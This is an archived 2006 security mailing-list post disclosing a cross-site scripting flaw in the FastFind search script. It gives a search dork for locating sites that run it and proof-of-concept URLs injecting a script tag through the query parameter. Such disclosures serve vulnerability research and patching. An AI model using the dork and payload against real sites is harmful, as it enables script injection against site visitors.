Sorry....My Message With Out Live Site....

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Sorry....My Message With Out Live Site....

Subject: Sorry....My Message With Out Live Site....
Date: 7 Oct 2006 16:56:02 -0000
From: suppressed

XSS IN FastFind...
DORK:
"Powered by FastFind - Search Engine Script"
Exploit:
http://[target]/[path]/index.php?query=<script>alert(1)</script>&type=simple
references:
http://www.interspire.com/fastfind/

Example:
http://www.target.com/fastfind/index.php?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&type=simple
http://www.target.com/search/index.php?query=<script>alert(1)</script>&type=simple

Prev by Date: Cahier de textes 2.0 Remote SQL injection Exploit
Next by Date: Re: Invision Power Board Multiple Vulnerabilities
Previous by thread: Cahier de textes 2.0 Remote SQL injection Exploit
Next by thread: Observations on Mandatory Integrity Control (MIC) in Windows Vista
Index(es):
- Date
- Thread

Mail converted by mhonarc 2.6.15
This archive provided courtesy of JSW4.NET, Internet Hosting Services for Small Business.